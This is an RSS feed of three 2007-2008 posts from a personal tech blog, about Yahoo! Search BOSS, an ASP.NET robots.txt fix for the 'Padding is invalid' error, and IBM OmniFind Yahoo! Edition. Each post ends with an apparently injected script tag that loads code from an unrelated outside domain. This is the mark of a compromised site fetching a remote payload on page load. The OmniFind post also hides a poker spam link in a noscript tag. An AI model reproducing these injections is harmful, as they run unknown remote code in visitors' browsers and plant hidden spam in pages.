<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Wacdesigns &#187; Search Engine</title>
	<atom:link href="http://www.wacdesigns.com/tag/search-engine/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wacdesigns.com</link>
	<description>What about Creativity ?</description>
	<lastBuildDate>Sat, 19 Jun 2010 12:58:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Yahoo! Search BOSS</title>
		<link>http://www.wacdesigns.com/2008/07/11/yahoo-search-boss/</link>
		<comments>http://www.wacdesigns.com/2008/07/11/yahoo-search-boss/#comments</comments>
		<pubDate>Fri, 11 Jul 2008 05:45:54 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Internet Articles]]></category>
		<category><![CDATA[Search Engine]]></category>
		<category><![CDATA[Tech]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Search BOSS]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=149</guid>
		<description><![CDATA[Yahoo has just opened his search engine to us developer folks, we can now mindle and medle about to improve our search result on our own website. The codename for this open API is BOSS (Build your Own Search Service). &#8230; <a href="http://www.wacdesigns.com/2008/07/11/yahoo-search-boss/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Yahoo has just opened his search engine to us developer folks, we can now mindle and medle about to improve our search result on our own website. The codename for this open API is BOSS (Build your Own Search Service). As describe in <a title="Yahoo’s desperate search times call for open source" href="http://blogs.zdnet.com/BTL/?p=9282&amp;tag=nl.e539" target="_blank">zdnet article</a>: is this a way for Yahoo to try to get some market shares in the search industry on GOOG.</p>
<p>Here is an extract from <a title="Yahoo! Search BOSS YDN" href="http://developer.yahoo.com/search/boss/" target="_blank">Yahoo! Search BOSS YDN</a></p>
<p style="padding-left: 30px;">BOSS (Build your Own Search Service) is Yahoo!&#8217;s open search web services platform. The goal of BOSS is simple: to  foster innovation in the search industry. Developers, start-ups, and large Internet companies can use BOSS to  build and launch web-scale search products that utilize the entire Yahoo! Search index. BOSS gives you access  to Yahoo!&#8217;s investments in crawling and indexing, ranking and relevancy algorithms, and powerful  infrastructure. By combining your unique assets and ideas with our search technology assets, BOSS is  a platform for the next generation of search innovation, serving hundreds of millions  of users across the Web.</p>
<p><img src="http://l.yimg.com/a/i/ydn/boss/boss_info4.gif" alt="Yahoo! Search BOSS" width="625" height="140" /></p>
<p>I&#8217;ll try to experiment a bit on it, to see if i can get to integrate the search on this blog for a small&#8230;<br />
[ad#co-inlinepost]<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/07/11/yahoo-search-boss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Padding is invalid and cannot be removed.</title>
		<link>http://www.wacdesigns.com/2008/01/18/google-crawling-webresourceaxd-scriptresourceaxd-padding-is-invalid-and-cannot-be-removed/</link>
		<comments>http://www.wacdesigns.com/2008/01/18/google-crawling-webresourceaxd-scriptresourceaxd-padding-is-invalid-and-cannot-be-removed/#comments</comments>
		<pubDate>Fri, 18 Jan 2008 12:32:38 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[.NET]]></category>
		<category><![CDATA[ASP.NET]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Search Engine]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Work]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/2008/01/18/google-crawling-webresourceaxd-scriptresourceaxd-padding-is-invalid-and-cannot-be-removed/</guid>
		<description><![CDATA[Stop Google crawling WebResource.axd &#38; ScriptResource.axd As an ASP.NET developer i often get error message: &#8220;Padding is invalid and cannot be removed&#8221;. It&#8217;s a pretty annoying message that i have been trying to get rid of for days. It was &#8230; <a href="http://www.wacdesigns.com/2008/01/18/google-crawling-webresourceaxd-scriptresourceaxd-padding-is-invalid-and-cannot-be-removed/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><strong>Stop Google crawling WebResource.axd &amp; ScriptResource.axd</strong><br />
As an ASP.NET developer i often get error message: &#8220;Padding is invalid and cannot be removed&#8221;. It&#8217;s a pretty annoying message that i have been trying to get rid of for days. It was caused by Google trying to index, crawl my WebResource.axd and  session. But when the session expires you get this error message. Since Google caches the pages it visits the session on this page has already expired after it is crawled, when it tries to crawl the page again and request the WebResource.axd or ScriptResource.axd with an old key, an exception is raised.</p>
<p>Therefore to solve this problem the simple solution for that is to modify your robots.txt file in your root directory</p>
<p>and add the following at the end</p>
<p>Disallow: /ScriptResource.axd<br />
Disallow:/WebResource.axd</p>
<p>With this no more issues regarding invalid padding.</p>
<p>If this does not solve your issue you can take a look at what other users propose <a title="Google Search Result" href="http://www.google.mu/search?hl=en&amp;q=Padding+is+invalid+and+cannot+be+removed&amp;btnG=Search" target="_blank">here</a>.</p>
<p>Some update on this issue, i found out while googling some days back:</p>
<p>On this post you can find  out  how to compress the webresource.axd and also somewhere in between prevent this error to occur.<br />
<a href="http://mironabramson.com/blog/post/2007/10/New--Shiny--WebResourceaxd-compression-Module.aspx" target="_blank"> http://mironabramson.com/blog/post/2007/10/New&#8211;Shiny&#8211;WebResourceaxd-compression-Module.aspx</a></p>
<p>Use the tool found at the website below to generate a machine key and a  decryption key:<br />
<a href="http://www.orcsweb.com/articles/aspnetmachinekey.aspx" target="_blank"> http://www.orcsweb.com/articles/aspnetmachinekey.aspx</a><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/01/18/google-crawling-webresourceaxd-scriptresourceaxd-padding-is-invalid-and-cannot-be-removed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IBM OmniFind Yahoo! Edition 8.4.2</title>
		<link>http://www.wacdesigns.com/2007/12/14/ibm-omnifind-yahoo-edition-842/</link>
		<comments>http://www.wacdesigns.com/2007/12/14/ibm-omnifind-yahoo-edition-842/#comments</comments>
		<pubDate>Fri, 14 Dec 2007 06:20:14 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Cool Tools]]></category>
		<category><![CDATA[Search Engine]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[OmniFind]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/2007/12/14/ibm-omnifind-yahoo-edition-842/</guid>
		<description><![CDATA[Quoted from OmniFind website. IBM and Yahoo! make information actionable with a simple, no-charge enterprise search solution. I have been able to play a few month with the OmniFind Yahoo! Edition from IBM, it&#8217;s quiet some powerful tool offered for &#8230; <a href="http://www.wacdesigns.com/2007/12/14/ibm-omnifind-yahoo-edition-842/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Quoted from <a title="IBM OmniFind Yahoo! Edition" href="http://omnifind.ibm.yahoo.net/" target="_blank">OmniFind website</a>.</p>
<blockquote><p>IBM and Yahoo! make information actionable with a simple,<br />
no-charge enterprise search solution.</p></blockquote>
<p>I have been able to play a few month with the OmniFind Yahoo! Edition from IBM, it&#8217;s quiet some powerful tool offered for <strong>free </strong>compared to the other search engines that are  offered on the net such as Google Custom Search Business, Google Mini, ISYS Web, Mondo Search, and some other tools that are listed here(http://www.searchtools.com).</p>
<p>Here are the features of OYE (OmniFind Yahoo! Edition)</p>
<p>Search internal web sites, local and remote file systems, and the public web</p>
<ul>
<li> Search up to 500,000 documents and 5 separate collections</li>
<li> Support for 200+ file types</li>
<li> Search in 30+ languages</li>
<li> Translated into 15 languages <a href="http://omnifind.ibm.yahoo.net/images/screenshots/translated_search_ui.jpg" target="_blank">View Screen Shot</a></li>
</ul>
<p>Intuitive out-of-the-box user interface with advanced features</p>
<ul>
<li> Based on Yahoo! Search UI View <a href="http://omnifind.ibm.yahoo.net/images/screenshots/search_ui.jpg" target="_blank">Screen Shot</a></li>
<li> Easily customized with graphical tools to configure look-and-feel, UI elements, branding View <a href="http://omnifind.ibm.yahoo.net/images/screenshots/custom_ui.jpg" target="_blank">Screen Shot</a></li>
<li> Spell suggestion</li>
<li> Full wildcard support</li>
</ul>
<p>Increased relevancy of results</p>
<ul>
<li> Configurable synonyms and featured links <a href="http://omnifind.ibm.yahoo.net/images/screenshots/synonyms.jpg" target="_blank">View Screen Shot</a></li>
<li> Tunable relevancy controls <a href="http://omnifind.ibm.yahoo.net/images/screenshots/tune_results_pane.jpg" target="_blank">View Screen Shot</a></li>
<li> Top queries, no results,<noscript>Les &amp;lt;a href=&#8221;http://www.visioconferencing.com&#8221;&amp;gt;poker&amp;lt;/a&amp;gt; sans téléchargement sont accessibles pour la plupart des ordinateurs et c&#8217;est leur plus grand avantage.</noscript> and result click through reporting to enable fine-tuning <a href="http://omnifind.ibm.yahoo.net/images/screenshots/query.jpg" target="_blank">View Screen Shot</a></li>
</ul>
<p>Easy to deploy, configure, and maintain</p>
<ul>
<li> No prerequisites</li>
<li> 3-click installer</li>
<li> 1-click startup</li>
<li> Go from the installer to searching in minutes</li>
</ul>
<p>Open and extensible</p>
<ul>
<li> Built on Apache Lucene</li>
<li> Open URL-based APIs (REST)</li>
<li> Define, populate and search your own custom fields</li>
<li> Easily embeddable and customizable UI output (XML/XSTL/HTML, HTML snippets)</li>
</ul>
<p>From my point of view the only inconvenience with this tool is that is not open for any<strong> plug in</strong> or <strong>add in</strong> functionalities. That could really help make it much much better for users. But again, this tool is complete and contains all the needed functionalities for an Entry Level Enterprise Search Engine.</p>
<p>Here are some screen shot of the new version of the  new version of OmniFind that i just upgrade from the 8.4.1<br />
<a title="Home - Default Index" href="http://www.wacdesigns.com/wp-content/uploads/2007/12/omnifind-1.JPG"><img src="http://www.wacdesigns.com/wp-content/uploads/2007/12/omnifind-1.thumbnail.JPG" alt="Home - Default Index" /></a></p>
<p><a title="Meta Tags section - New to the 8.4.2" href="http://www.wacdesigns.com/wp-content/uploads/2007/12/omnifind-2.JPG"><img src="http://www.wacdesigns.com/wp-content/uploads/2007/12/omnifind-2.thumbnail.JPG" alt="Meta Tags section - New to the 8.4.2" /></a></p>
<p><a title="OmniFind Custom Search Page Designer" href="http://www.wacdesigns.com/wp-content/uploads/2007/12/omnifind-3.JPG"><img src="http://www.wacdesigns.com/wp-content/uploads/2007/12/omnifind-3.thumbnail.JPG" alt="OmniFind Custom Search Page Designer" /></a><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2007/12/14/ibm-omnifind-yahoo-edition-842/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
